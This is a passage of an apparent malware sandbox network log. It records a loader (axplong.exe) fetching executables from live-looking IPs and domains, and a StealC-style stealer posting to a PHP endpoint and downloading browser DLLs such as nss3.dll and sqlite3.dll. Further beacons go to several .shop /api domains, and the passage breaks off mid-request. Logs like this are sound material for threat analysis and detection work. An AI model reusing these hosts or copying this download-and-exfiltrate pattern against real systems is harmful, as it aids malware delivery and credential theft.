Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/runtime.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/runtime.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:16 GMT
Content-Type: application/octet-stream
Content-Length: 1411961
Last-Modified: Fri, 30 Aug 2024 22:54:50 GMT
Connection: keep-alive
ETag: "66d24dba-158b79"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

ddl.safone.dev

axplong.exe

Remote address:

8.8.8.8:53

Request

ddl.safone.dev

IN A

Response

ddl.safone.dev

IN CNAME

cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com

cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com

IN A

63.32.161.232

cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com

IN A

54.247.69.169

cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com

IN A

52.212.52.84
GET

http://ddl.safone.dev/3823166/crypted.exe?hash=AgADZl

axplong.exe

Remote address:

63.32.161.232:80

Request

GET /3823166/crypted.exe?hash=AgADZl HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 200 OK

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725100754&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=rWTvcIsweCalk6jya3EzKPaIlFSwxBOebmekHEV4GT0%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725100754&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=rWTvcIsweCalk6jya3EzKPaIlFSwxBOebmekHEV4GT0%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: application/x-msdownload
Range: bytes=0-322047
Content-Range: bytes 0-322047/322048
Content-Disposition: attachment; filename="crypted.exe"
Accept-Ranges: bytes
Content-Length: 322048
Date: Sat, 31 Aug 2024 10:39:14 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
GET

http://ddl.safone.dev/3827530/caesium-image-compressor.exe?hash=AgADPx

axplong.exe

Remote address:

63.32.161.232:80

Request

GET /3827530/caesium-image-compressor.exe?hash=AgADPx HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 200 OK

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725100762&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=4h5QjNQKy36Bt8qZY4u4DexhQp0D6ZGQEOtAGhc%2BZoU%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725100762&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=4h5QjNQKy36Bt8qZY4u4DexhQp0D6ZGQEOtAGhc%2BZoU%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: application/x-msdownload
Range: bytes=0-6827007
Content-Range: bytes 0-6827007/6827008
Content-Disposition: attachment; filename="caesium-image-compressor.exe"
Accept-Ranges: bytes
Content-Length: 6827008
Date: Sat, 31 Aug 2024 10:39:22 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
GET

http://ddl.safone.dev/3803980/whiteheroin.exe?hash=AgADjF

axplong.exe

Remote address:

63.32.161.232:80

Request

GET /3803980/whiteheroin.exe?hash=AgADjF HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 404 Not Found

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725100806&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=26aXWBjwEPRMhEkLDt9gkZWkFv3q0%2FK%2FENqaOSfs5Mg%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725100806&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=26aXWBjwEPRMhEkLDt9gkZWkFv3q0%2FK%2FENqaOSfs5Mg%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Content-Length: 15
Date: Sat, 31 Aug 2024 10:40:07 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
GET

http://ddl.safone.dev/3830515/PureSyncInst.exe?hash=AgADvR

axplong.exe

Remote address:

63.32.161.232:80

Request

GET /3830515/PureSyncInst.exe?hash=AgADvR HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 200 OK

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725100808&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=DlLa2VzhHX1A%2BhRWsaqI3F25rMto52deMLK3vDuPijY%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725100808&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=DlLa2VzhHX1A%2BhRWsaqI3F25rMto52deMLK3vDuPijY%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: application/x-msdownload
Range: bytes=0-9697279
Content-Range: bytes 0-9697279/9697280
Content-Disposition: attachment; filename="PureSyncInst.exe"
Accept-Ranges: bytes
Content-Length: 9697280
Date: Sat, 31 Aug 2024 10:40:08 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
GET

http://ddl.safone.dev/3831777/setup.exe?hash=AgADKw

axplong.exe

Remote address:

63.32.161.232:80

Request

GET /3831777/setup.exe?hash=AgADKw HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 200 OK

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725100819&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=IyGlimq3LBRQr4GFTgnRQFLq1UW24up6CyEq%2BcGWJ2k%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725100819&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=IyGlimq3LBRQr4GFTgnRQFLq1UW24up6CyEq%2BcGWJ2k%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: application/x-ms-dos-executable
Range: bytes=0-3958976
Content-Range: bytes 0-3958976/3958977
Content-Disposition: attachment; filename="setup.exe"
Accept-Ranges: bytes
Content-Length: 3958977
Date: Sat, 31 Aug 2024 10:40:19 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

16.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.113.215.185.in-addr.arpa

IN PTR

Response
DNS

232.161.32.63.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.161.32.63.in-addr.arpa

IN PTR

Response

232.161.32.63.in-addr.arpa

IN PTR

ec2-63-32-161-232 eu-west-1compute amazonawscom
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

45.250.179.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.250.179.95.in-addr.arpa

IN PTR

Response

45.250.179.95.in-addr.arpa

IN PTR

9517925045vultrusercontentcom
GET

http://185.215.113.26/Nework.exe

axplong.exe

Remote address:

185.215.113.26:80

Request

GET /Nework.exe HTTP/1.1
Host: 185.215.113.26

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:18 GMT
Content-Type: application/x-msdos-program
Content-Length: 425984
Connection: keep-alive
Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT
ETag: "68000-620711078a800"
Accept-Ranges: bytes
DNS

26.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.113.215.185.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.26/Dem7kTu/index.php

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

POST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.26/Dem7kTu/index.php

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

POST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

51.18.21.65.in-addr.arpa

Remote address:

8.8.8.8:53

Request

51.18.21.65.in-addr.arpa

IN PTR

Response

51.18.21.65.in-addr.arpa

IN PTR

static51182165clientsyour-serverde
DNS

53.107.216.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.107.216.95.in-addr.arpa

IN PTR

Response

53.107.216.95.in-addr.arpa

IN PTR

static5310721695clientsyour-serverde
GET

http://185.215.113.17/

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET / HTTP/1.1
Host: 185.215.113.17
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFC
Host: 185.215.113.17
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJKEHCAKFBFHJKEHCFI
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFH
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCA
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCB
Host: 185.215.113.17
Content-Length: 4955
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAAFCAFCBKFHJJJKKFHI
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.17/f1ddeb6592c03206/freebl3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/mozglue.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/nss3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/nss3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/softokn3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFI
Host: 185.215.113.17
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAK
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBA
Host: 185.215.113.17
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAEHIEBGHDAFIEBGIEHJ
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKK
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIE
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

17.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.113.215.185.in-addr.arpa

IN PTR

Response
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

femininedspzmhu.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

femininedspzmhu.shop

IN A

Response

femininedspzmhu.shop

IN A

172.67.162.113

femininedspzmhu.shop

IN A

104.21.66.172
POST

https://femininedspzmhu.shop/api

BitLockerToGo.exe

Remote address:

172.67.162.113:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: femininedspzmhu.shop

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fchvu2pern445f1cd3suj66p1c; expires=Wed, 25 Dec 2024 04:26:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88tkR0F92GTQRU3i4bc1emR9hP%2FiOwKw8%2F6MeMyj%2BbiBkdqA1tXuegC0z2KSt7XU50I1yx9yfv5Gfplshht2gtsQMpCimoi7PRgVdMfFnQOO6d3g78Yk0s9m3gBLc76%2BVgCOGxGXEA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bbc65f89f1593f7-LHR
alt-svc: h3=":443"; ma=86400
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

locatedblsoqp.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

locatedblsoqp.shop

IN A

Response

locatedblsoqp.shop

IN A

104.21.58.213

locatedblsoqp.shop

IN A

172.67.207.182
POST

https://locatedblsoqp.shop/api

BitLockerToGo.exe

Remote address:

104.21.58.213:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: locatedblsoqp.shop

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=9eji7m4nq81j80vtj895mkts14; expires=Wed, 25 Dec 2024 04:26:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2B29dlUx%2BnaAzqpDbzCzFxsLKfiHDIU%2BGCqNFvlAmCCH34VOx5XNhS9yxksrL1ikQ%2FNeGU7ZOTyx6iJVW270ARdiv8ONTHbWcIa%2FeSgXWxtaRxSb0KO6Z0C%2FrMCPNQLYI1Q8ATI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bbc65fb5e23778c-LHR
alt-svc: h3=":443"; ma=86400
DNS

traineiwnqo.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

traineiwnqo.shop

IN A

Response

traineiwnqo.shop

IN A

172.67.177.240

traineiwnqo.shop

IN A

104.21.67.155
DNS

traineiwnqo.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

traineiwnqo.shop

IN A
DNS

213.58.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.58.21.104.in-addr.arpa

IN PTR

Response
DNS

113.162.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.162.67.172.in-addr.arpa

IN PTR

Response
POST

https://traineiwnqo.shop/api

BitLockerToGo.exe

Remote address:

172.67.177.240:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: traineiwnqo.shop

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x54RWCsUSfEhEXb9%2BQ0uFrsudfba0bkVnHltv75gR8Wk7INGjmeZv%2FNnvBOE5tClkYUdPu82h17p2pgX2p2aovSkPZgDAH%2FpvRcFkcfaKSuumK0b2LxNaRV4NKjGO6lKMm4H"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bbc660469604970-LHR
POST

https://traineiwnqo.shop/api

BitLockerToGo.exe

Remote address:

172.67.177.240:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=wA0miG1Wk_TyjtH5riopCGuszbZHZQSUqplXHjWOcI0-1725100785-0.0.1.1-/api
